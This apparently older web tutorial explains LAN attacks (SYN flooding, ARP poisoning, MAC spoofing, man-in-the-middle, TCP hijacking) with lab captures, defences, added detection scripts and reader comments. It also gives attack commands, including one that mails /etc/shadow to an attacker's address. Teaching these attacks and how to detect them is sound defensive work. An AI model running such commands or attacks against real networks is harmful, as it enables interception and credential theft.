THREATS ON THE LAN



Authors:
Amitesh Singh([email protected], http://amitesh.cjb.net)
Mohit Bhatnagar([email protected])
B.Tech(Indian School of Mines, INDIA)

Communication on a LAN takes place through protocols such as TCP/IP, UDP/IP, ARP and ICMP; the most widely used of these is TCP/IP.

 

TCP (Transmission Control Protocol)

      

Data sent on the network is in the form of packets, which carry information about the source, the target and the data to be delivered. TCP is a protocol developed to make sure that packets are not lost on the network as routers pass them from computer to computer. TCP splits a packet into little pieces; each piece is called a datagram.

A typical datagram looks like this:

    +-----------------+-------------------------------------+
    | ETHERNET HEADER | Destination MAC, Source MAC         |
    +-----------------+-------------------------------------+
    | IP HEADER       | Dest IP, port and Source IP, port   |
    +-----------------+-------------------------------------+
    | TCP HEADER      | SYN, ACK, PSH, RST                  |
    +-----------------+-------------------------------------+
    | DATA            |                                     |
    +-----------------+-------------------------------------+

The address of the network card is called the MAC address. The MAC address is a globally unique and unchangeable address which is stored on the network card itself.

TCP HEADER FLAGS (the ones we care about)

  • SYN: used in the initial connection setup.
  • ACK: used to acknowledge received data; this is what makes TCP reliable.
  • PSH: set when there is data in the packet to be pushed up to the application.
  • RST: signals that something is horribly wrong (such as a closed port); the other side must stop sending data.

HOW A TCP CONNECTION IS ESTABLISHED

Sending a packet with the SYN flag set means its sender wants to establish a TCP/IP connection with the destination system through a three-way handshake. Let's look at this more closely.

Suppose you are A and the other host is B, and you want a connection with B.

A----------------------SYN----------------------B

B-------------------SYN/ACK------------------A

A---------------------ACK-----------------------B

Now the TCP connection is established.
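As an added illustration (not code from the original article), here is a small Python model of the server side of this handshake. It tracks the SYN_RECEIVED and ESTABLISHED states per peer and keeps a bounded backlog of half-open entries, so it also shows the mechanism the SYN flooding section below relies on: a SYN whose sender never answers the SYN/ACK stays half-open until it times out, and once the backlog is full a real client gets no SYN/ACK at all. The peer addresses, backlog size and timeout are constructed values.

```python
# Added example: server-side model of the TCP three-way handshake.
# Not the article's code; addresses, backlog and timeout are constructed.
from dataclasses import dataclass, field

SYN, ACK = "SYN", "ACK"


@dataclass
class Listener:
    """Connection table for one listening port."""
    backlog: int = 4                                    # max half-open entries kept
    half_open: dict = field(default_factory=dict)       # peer -> age in ticks (SYN_RECEIVED)
    established: set = field(default_factory=set)       # peers that completed the handshake
    dropped: int = 0                                    # SYNs refused because the backlog was full

    def on_segment(self, peer, flags):
        """Process one segment from `peer` (an (ip, port) tuple); return our reply flags or None."""
        flags = set(flags)
        if flags == {SYN}:
            if peer in self.half_open or peer in self.established:
                return None                             # duplicate SYN, nothing new
            if len(self.half_open) >= self.backlog:
                self.dropped += 1                       # no room: even a real client is ignored
                return None
            self.half_open[peer] = 0                    # step 2: we are now in SYN_RECEIVED
            return {SYN, ACK}
        if flags == {ACK} and peer in self.half_open:
            del self.half_open[peer]                    # step 3 completes the handshake
            self.established.add(peer)
            return None
        return None                                     # other segments are ignored in this toy

    def tick(self, timeout):
        """Age the half-open entries; expire those whose ACK never arrived."""
        for peer in list(self.half_open):
            self.half_open[peer] += 1
            if self.half_open[peer] >= timeout:
                del self.half_open[peer]

    def state_of(self, peer):
        if peer in self.established:
            return "ESTABLISHED"
        if peer in self.half_open:
            return "SYN_RECEIVED"
        return "CLOSED"


def demo():
    """A real client completes the handshake; SYNs from a non-existent host never do."""
    srv = Listener(backlog=4)
    real = ("169.254.0.20", 1025)
    srv.on_segment(real, {SYN})
    srv.on_segment(real, {ACK})
    # four SYNs from an address that does not exist on the LAN: the SYN/ACKs are
    # never answered, so the entries stay in SYN_RECEIVED and fill the backlog
    for port in range(1, 5):
        srv.on_segment(("169.254.0.21", port), {SYN})
    # a second legitimate client now gets no SYN/ACK
    refused = srv.on_segment(("169.254.0.22", 2000), {SYN}) is None
    return srv, refused


if __name__ == "__main__":
    srv, refused = demo()
    print("half-open:", len(srv.half_open), "dropped:", srv.dropped, "refused:", refused)
    srv.tick(timeout=1)
    print("half-open after timeout:", len(srv.half_open))
```

The timeout in `tick()` stands in for the retransmission timer a real stack runs on the SYN/ACK; until it fires, the half-open entry holds memory, which is exactly the resource a SYN flood exhausts.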

SYN FLOODING

SYN flooding is an attack in which a large number of SYN packets are sent to the target (victim) by an attacker from a fake IP address, so that all the memory of the target is used up trying to establish connections with a fake IP address that does not exist on the network.

Effects

As a result of SYN flooding, all the services running on the attacked ports of the target computer are affected. The computer is kept busy sending SYN/ACK packets and is unable to provide service to legitimate users or clients. If an enormously large number of SYN packets are sent, the target may hang or reboot.

How the attack is done:

Windows is vulnerable to the SYN-flood attack.

Here is the state of 169.254.0.18 when we flooded it from my computer (169.254.0.20) using the fake IP address 169.254.1.21, at ports 25 and 139. The fake address must carry your network ID (here 169.254) and must not exist on the LAN; you can check whether it exists by pinging it.

C:\>netstat

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    169.254.0.18:25        169.254.0.21:21        SYN_RECEIVED
  TCP    169.254.0.18:139       169.254.0.21:139       SYN_RECEIVED

How to detect a SYN attack

When the attacker's system sends a SYN packet to the client, the client replies with a SYN/ACK packet and then waits for an ACK. While it waits, the connection is said to be half-open, or the client is said to be in the SYN_RECEIVED state. That state is what one can use to detect whether a system is under a SYN flood.

arp -a: another way to detect a SYN attack

During the attack above, the ARP cache of 169.254.0.18 is

Interface: 169.254.0.18 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.21          00-00-00-00-00-00     invalid
  169.254.74.30         00-0c-6e-f1-9e-a3     dynamic

As the first entry shows, if the type is "invalid" and the physical address is all zeros (the victim's ARP request for the fake source address was never answered), it can be deduced that you are under a SYN flood.
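The two indicators just described can be checked mechanically. The following Python script is an added example, not part of the original article: it parses Windows `netstat` and `arp -a` output of the shape shown above, counts connections stuck in SYN_RECEIVED per local port, and lists ARP entries of type "invalid" with an all-zero MAC. The sample listings are constructed from the article's output (one extra SYN_RECEIVED line and one ESTABLISHED line were added to make the counting visible), and the alert threshold is an assumption.

```python
# Added example: SYN-flood indicators from netstat / arp -a output.
# Not the article's code; sample listings are constructed, threshold is assumed.
import re
from collections import Counter

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    169.254.0.18:25        169.254.0.21:21        SYN_RECEIVED
  TCP    169.254.0.18:139       169.254.0.21:139       SYN_RECEIVED
  TCP    169.254.0.18:139       169.254.0.21:140       SYN_RECEIVED
  TCP    169.254.0.18:139       169.254.74.30:1045     ESTABLISHED
"""

ARP_SAMPLE = """\
Interface: 169.254.0.18 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.21          00-00-00-00-00-00     invalid
  169.254.74.30         00-0c-6e-f1-9e-a3     dynamic
"""

# one netstat row: proto, local ip:port, foreign ip:port, state
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$", re.M)
# one arp -a row: ip, dashed MAC, type
ARP_RE = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f-]{17})\s+(\w+)\s*$", re.M | re.I)


def half_open_by_port(netstat_text):
    """Count SYN_RECEIVED entries per local port, and the peer IPs behind them."""
    per_port = Counter()
    peers = {}
    for _local_ip, lport, rip, _rport, state in NETSTAT_RE.findall(netstat_text):
        if state == "SYN_RECEIVED":
            per_port[int(lport)] += 1
            peers.setdefault(int(lport), set()).add(rip)
    return per_port, peers


def invalid_arp_entries(arp_text):
    """Return (ip, mac) pairs whose type is 'invalid' and whose MAC is all zeros."""
    return [(ip, mac) for ip, mac, typ in ARP_RE.findall(arp_text)
            if typ.lower() == "invalid" and set(mac.replace("-", "")) == {"0"}]


def syn_flood_report(netstat_text, arp_text, threshold=2):
    """Combine both indicators into a list of findings (empty list = nothing suspicious)."""
    findings = []
    per_port, peers = half_open_by_port(netstat_text)
    for port, n in sorted(per_port.items()):
        if n >= threshold:
            findings.append(f"port {port}: {n} half-open connections from {sorted(peers[port])}")
    for ip, mac in invalid_arp_entries(arp_text):
        findings.append(f"ARP: {ip} unresolved ({mac}, invalid): SYN source never answered ARP")
    return findings


if __name__ == "__main__":
    for line in syn_flood_report(NETSTAT_SAMPLE, ARP_SAMPLE):
        print(line)
```

On a real host the two strings would come from running `netstat -an` and `arp -a`; the threshold should be tuned to the normal number of half-open connections the service sees, since a busy server legitimately has a few at any instant.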

SPOOFING

Spoofing is a technique for disguising yourself as somebody else, who may or may not exist on the network, depending on your choice. It forms the basis of attacks on the network. There are many types of spoofing, such as

  • IP Spoofing
  • ARP Spoofing
  • DNS Spoofing

In this paper I shall discuss only ARP spoofing.

ARP SPOOFING

Any computer connected to a switched network (LAN) has two addresses.

  • MAC Address
  • IP Address

The MAC address is the network card's address, and it is fixed. It is essential so that the Ethernet protocol can send data back and forth independent of whatever protocols (TCP/IP, UDP, FTP etc.) are used on top of it. Ethernet builds frames of data, and each frame has an Ethernet header containing the MAC addresses of the source and the destination computer.

The IP address is a virtual address of the computer on the network.

HOW LAN WORKS

When an Ethernet frame is constructed, it must be built from an IP packet. At the time of construction, Ethernet has no idea what the MAC address of the destination machine is, yet it needs that address to create the Ethernet header. The only information it has available is the destination IP from the packet's header. So there must be a way for the Ethernet layer to find the MAC address of the destination machine, given a destination IP.

This is where ARP (Address Resolution Protocol) comes into play.

Fig 1

Let us suppose A (169.254.0.1) wants to connect to C (169.254.0.3). A will generate an ARP request packet and broadcast it to all the hosts on the network, asking "Is your IP address 169.254.0.3? If so, send your MAC address to me."

Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it in and hands the ARP request to the networking software running on the system. Only C, with IP address 169.254.0.3, will respond, by sending a packet containing C's MAC address back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the higher-level protocol communication can proceed.

To minimize the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it updates its ARP cache with the new IP/MAC association.

 

If you want to know the MAC address of a remote host, just type

C:\>nbtstat -A 169.254.24.60      OR      nbtstat -a chetan

Local Area Connection:
Node IPAddress: [169.254.0.20] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    CHETAN         <00>  UNIQUE      Registered
    CHETAN         <20>  UNIQUE      Registered
    MSHOME         <00>  GROUP       Registered
    MSHOME         <1E>  GROUP       Registered
    CHETAN         <01>  UNIQUE      Registered
    CHETAN         <03>  UNIQUE      Registered
    C_VERMA        <03>  UNIQUE      Registered

    MAC Address = 00-0C-6E-94-0A-BF

 

HOW A SWITCH WORKS

The frame carries the destination IP taken from the IP header of the packet, but by itself it knows nothing about the destination MAC address; a physical link-layer path between the two systems still has to be found.

A switch maintains a table that maps switch port numbers to the corresponding MAC addresses. The table is built after the switch is powered on: as the first frame passes through a port, the frame's source MAC address is recorded against that port.

    Port   MAC
    1
    2
    3

This is the situation when no ARP request/reply or data transfer has taken place. Suppose H wants to connect to T1 (refer to Fig 3): an ARP request is broadcast over the LAN to all current hosts, asking "Is your IP X1? If so, send me back your MAC address." When this passes through the switch, an entry for H's MAC address is made in the switch's cache. Now the table looks like

    Port   MAC
    1
    2
    3      M3

T1 responds with an ARP reply, unicast to H, containing its own MAC address. Moreover, the ARP cache of T1 now holds an entry for H's IP address and MAC address, so it sends the ARP reply directly to H. As this reply passes from port 1 into the switch, the cache of the switch is updated to

    Port   MAC
    1      M1
    2
    3      M3

When the ARP reply reaches the switch, the switch decides which port to send the frame to by comparing the frame's destination MAC address against its internal table mapping port numbers to MAC addresses. The frame is then sent down the cable through port 3.
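The learning and forwarding rules just described, written out as a small Python model (an added example, not code from the article). The port numbers and the names H, T1, M1 and M3 follow the article's figure; the frames are constructed. The model makes one security-relevant property explicit: the table is keyed by source MAC and the most recently seen port wins, which is what the MAC spoofing section later depends on.

```python
# Added example: a learning switch with the port/MAC table from the article.
# Not the article's code; port numbers and MAC names follow its figure.
BROADCAST = "ff:ff:ff:ff:ff:ff"


class Switch:
    """Learning switch: a table of MAC -> port, empty at power-on."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.table = {}

    def forward(self, in_port, src_mac, dst_mac):
        """Learn src_mac on in_port, then return the list of ports the frame leaves on."""
        # learning: the most recent port a source MAC was seen on wins, so a station
        # that forges another host's MAC pulls that host's entry onto its own port
        self.table[src_mac] = in_port
        if dst_mac != BROADCAST and dst_mac in self.table:
            out = self.table[dst_mac]
            return [] if out == in_port else [out]      # known MAC: one port only
        return [p for p in self.ports if p != in_port]  # unknown or broadcast: flood

    def as_port_table(self):
        """Render the table the way the article draws it: port -> MAC (None if unlearned)."""
        by_port = {port: mac for mac, port in self.table.items()}
        return {p: by_port.get(p) for p in self.ports}


def walkthrough():
    """Replay the ARP exchange between H (M3 on port 3) and T1 (M1 on port 1)."""
    sw = Switch(ports=[1, 2, 3])
    steps = []
    # 1. H broadcasts an ARP request: the switch learns M3 on port 3 and floods to 1 and 2
    steps.append(sw.forward(3, "M3", BROADCAST))
    # 2. T1 unicasts its ARP reply to M3: the switch learns M1 on port 1 and sends only to port 3
    steps.append(sw.forward(1, "M1", "M3"))
    return sw, steps


if __name__ == "__main__":
    sw, steps = walkthrough()
    print("ports used per step:", steps)
    print("table:", sw.as_port_table())
```

After `walkthrough()` the table reads port 1 = M1, port 3 = M3 and port 2 empty, matching the third snapshot above. Feeding the switch a frame on port 2 with source M3 would silently move M3's entry to port 2; managed switches counter this with port security (a fixed MAC per port) precisely because the learning rule itself has no notion of a legitimate owner.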

 

HERE IS THE BUG

As ARP is a stateless protocol, most operating systems will update their cache when a reply is received, regardless of whether they ever sent a request.

We can exploit this bug.

 

ARP POISONING

To view your cache you can type arp -a at the command prompt in Windows (and of course in Linux too).

C:\>arp -a

Interface: 169.254.0.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.3           00-50-ba-8e-ff-e8     dynamic
  169.254.32.218        00-0b-2b-0d-fb-69     dynamic
  169.254.105.118       00-50-fc-b0-f3-50     dynamic

  • 169.254.0.1: your IP address
  • 0x1000003: the code for your interface (in this case eth0)
  • 169.254.0.3: the IP address of the remote device you are connected to
  • 00-50-ba-8e-ff-e8: the MAC address of that machine
  • dynamic: the link type

Let's observe the communication between my machine and 169.254.0.3. I have its IP and MAC in my ARP table, and it has my IP and MAC in its ARP table. These values are updated once every 30 seconds. If a malicious user sends me a spoofed packet which maps 169.254.0.3 to a non-existent MAC, I won't be able to communicate with 169.254.0.3 for at least 30 seconds! Enough for an attacker to hijack my session. This is called ARP poisoning.

Now my ARP cache will look like

C:\>arp -a

Interface: 169.254.0.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.3           00-50-ba-4e-ff-e3     invalid
  169.254.32.218        00-0b-2b-0d-fb-69     dynamic
  169.254.105.118       00-50-fc-b0-f3-50     dynamic

ATTACKS

MAC SPOOFING

Obtaining the MAC address of another system without sending your real MAC address, that is, without your real MAC address ever entering the other system's ARP cache, is MAC spoofing.

Fig 2

AIM: H aims to learn the MAC of A without revealing his real MAC.

H broadcasts an ARP request over the network, destined for A, with a fake source MAC address Mf. Now there is an entry for Mf in the switch's cache corresponding to H's port, i.e. port 2. A sends an ARP reply containing his real MAC address to Mf. When this frame reaches the switch, the fake MAC address is mapped to H's port (2), and so it is delivered to H. Since the Ethernet card of H is in promiscuous mode, in which it is allowed to examine frames destined for MAC addresses other than its own, A's real MAC address ends up in H's ARP cache.

In Linux, promiscuous mode can be enabled with

# ifconfig eth0 promisc

and disabled with

# ifconfig eth0 -promisc

MAN IN THE MIDDLE ATTACK

Fig 3

Here H tries to insert itself into the communication path between T1 and T2. H forwards frames between the target computers so that communication is not interrupted.

H poisons the ARP caches of T1 and T2 in this way:

H sends a spoofed ARP reply to T1 containing T2's IP with H's MAC.

At the same time it sends a spoofed ARP reply to T2 containing T1's IP with H's MAC.

Now all IP traffic between T1 and T2 goes to H first instead of directly to each other.

How the attack works

As T1 and T2 are communicating with each other, T1's ARP cache contains T2's IP and MAC address and vice versa. H poisons the caches of T1 and T2: it sends a spoofed ARP reply to T1 containing T2's IP and H's MAC, and to T2 one containing T1's IP and H's MAC. Now in T1's cache the IP address of T2 is associated with the MAC address of H. When T1 wants to send a packet, it is first split into frames. The frame takes the destination IP from the IP header of the packet and the destination MAC from the cache. This frame, carrying the IP address of T2 and the MAC address of H, is sent over the cable to the switch. The switch looks up the frame's destination MAC in its port table, finds port 3, and so the frame is delivered to H. The same happens for T2. H then forwards the data coming from T1 to T2 and from T2 to T1, so that the connection between T1 and T2 is not interrupted and the attack leaves no trace.

SOLUTION

To avoid this type of attack, T1 should have a static entry for T2's IP and MAC, and T2 a static entry for T1's IP and MAC, in their respective caches.

T1 makes a static entry for T2 in this way:

C:\>arp -s X2 M2

EXPERIMENT

We performed this attack on the LAN successfully:

    Comp.  Name      IP Address   OS                                MAC
    H      Hacker    169.254.0.1  Fedora Core (2.4.22-1.2115.nptl)  00:0c:f1:6b:78:4f
    T1     Target 1  169.254.0.2  Windows 2000 (Version 5.00.2195)  00:02:44:57:7c:45
    T2     Target 2  169.254.0.3  Windows XP (Version 5.1.2600)     00:50:ba:8f:00:0a

H sends spoofed ARP replies to T1 and T2. The ARP caches of T1 and T2 while they were spoofed:

T1:

Interface: 169.254.0.2 --- 0x2
  Internet Address      Physical Address      Type
  169.254.0.3           00-0c-f1-6b-78-4f     dynamic

We can see that in the cache of T1, the IP address of T2 corresponds to H's MAC.

T2:

Interface: 169.254.0.3 on Interface 0x2
  Internet Address      Physical Address      Type
  169.254.0.2           00-0c-f1-6b-78-4f     dynamic

On the hacker's system, the packets received are:

23:42:02.474661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:04.084663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:04.484652 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:06.094662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:06.494660 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:08.104664 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:08.504663 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:10.114661 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

When 169.254.0.2 tried to connect to 169.254.0.3 on port 25, the packet passed through 169.254.0.1, as shown below; this proves that 169.254.0.1 now sits between T1 and T2.

 

23:42:46.294660 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:46.694653 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:46.705306 169.254.0.2.1163>169.254.0.3.smtp: S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)

Also, when 169.254.0.3 tried to troubleshoot 169.254.0.2 with the ping command, the datagram again passed through 169.254.0.1, as shown below.

 

23:43:27.254104 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]

23:43:28.504663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:28.904661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:43:30.266360 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]

23:43:30.514657 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:30.914662 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:43:32.524663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:32.924654 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:43:33.270757 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]

23:43:34.534662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:34.935399 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
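The capture above carries the signature a defender should look for: one MAC (H's) answering "is-at" for two different IPs, repeated every two seconds without any request. The following Python detector is an added example, not part of the original article or experiment. It reads tcpdump-style "arp reply <ip> is-at <mac>" lines and raises an alert when an IP's MAC changes, when one MAC claims more than one IP, or when a reply contradicts a trusted IP-to-MAC inventory; that inventory plays the role of the static `arp -s` entries from the SOLUTION section, and here it is built from the experiment table. The capture sample is constructed from the lines above, with one extra, constructed line in front showing T2's real MAC before the poisoning started; the function names are my own.

```python
# Added example: ARP-poisoning detector over tcpdump "arp reply ... is-at ..." lines.
# Not the article's code; the first capture line and the helper names are constructed.
import re

# trusted IP -> MAC inventory, taken from the experiment table (T1, T2)
TRUSTED = {
    "169.254.0.2": "00:02:44:57:7c:45",
    "169.254.0.3": "00:50:ba:8f:00:0a",
}

CAPTURE = """\
23:41:50.000000 arp reply 169.254.0.3 is-at 0:50:ba:8f:0:a
23:42:02.474661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:04.084663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:04.484652 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:46.705306 169.254.0.2.1163 > 169.254.0.3.smtp: S 398263844:398263844(0) win 64240
"""

LINE_RE = re.compile(r"^(\S+) arp reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]+)\s*$", re.I)


def norm_mac(mac):
    """tcpdump prints 0:c:f1:...; normalise to 00:0c:f1:... so MACs compare equal."""
    return ":".join(part.zfill(2) for part in mac.lower().split(":"))


def parse_arp_replies(text):
    """Return (timestamp, ip, mac) for every ARP reply line; other lines are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append((m.group(1), m.group(2), norm_mac(m.group(3))))
    return out


def detect_poisoning(replies, trusted):
    """Alert on inventory mismatches, IP->MAC changes and one MAC claiming several IPs."""
    last_mac = {}          # ip  -> MAC most recently announced for it
    claimed = {}           # mac -> set of IPs it has answered for
    alerts = []
    for ts, ip, mac in replies:
        if ip in trusted and trusted[ip] != mac:
            alerts.append(f"{ts} {ip} announced by {mac}, inventory says {trusted[ip]}")
        if ip in last_mac and last_mac[ip] != mac:
            alerts.append(f"{ts} {ip} changed from {last_mac[ip]} to {mac}")
        last_mac[ip] = mac
        ips = claimed.setdefault(mac, set())
        if ips and ip not in ips:
            alerts.append(f"{ts} {mac} now answers for {sorted(ips | {ip})}")
        ips.add(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_poisoning(parse_arp_replies(CAPTURE), TRUSTED):
        print(alert)
```

Without an inventory the detector still catches the poisoning from the traffic alone (the MAC change for 169.254.0.3 and the one MAC answering for both targets); with the inventory every spoofed reply is flagged, which is the same assurance a static `arp -s` entry gives the host itself.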

CHANGING MAC ADDRESS

I mentioned above that the MAC address cannot be changed, but Linux users can change their MAC address without any spoofing software, using a single ifconfig parameter. We can exploit this:

# ifconfig eth0 hw ether 00:0c:ff:4f:e8

In Windows 2000/XP you can do it using software such as SMAC.

This can be exploited as follows: H DoS-attacks T2 (refer to Fig. 3), then assigns himself the IP and MAC of T2, receiving all frames from T1 intended for T2.

TCP/IP HIJACKING

Fig 4

Let us suppose A has connected to server B as the root administrator using a TELNET or FTP service. A hacker H who is able to sniff the traffic will ARP-poison A, reset his own settings to those of A, and then be able to issue commands in place of A, such as mail [email protected] </etc/shadow; that is enough. The hacker must DoS A, with either SYN flooding or ARP poisoning, so that A cannot interfere with the attack by storming ARP requests.

SOLUTION

Instead of a telnet login, A can use an SSH (Secure Shell) or SFTP login to avoid TCP/IP hijacking.




3 comments






Good article!

it sucks
u r an*\*****...........

---December 10, 2004

That's pretty stupid.

If you can write a better article, we're happy to publish it. If you want to add specific comments to make this better, we'll publish those too. But your stupid comment doesn't help anyone, does it?

--TonyLawrence


---December 10, 2004

Hi,
I found your article very interesting and easy reading except for the fact that I couldn't see any images that are referred to in the article. Could you please ensure that the images are available. Ta.

-- Ajay Kamath

---December 21, 2004







Wed Apr 13 10:36:16 2005: 337   anonymous


good articles..easy to understand the content.simple language.nice!! i like it.it helps me a lot.






Sat Oct 15 07:48:52 2005: 1206   rajasekhar


ur article was very informative about the practical view of a network transmission,
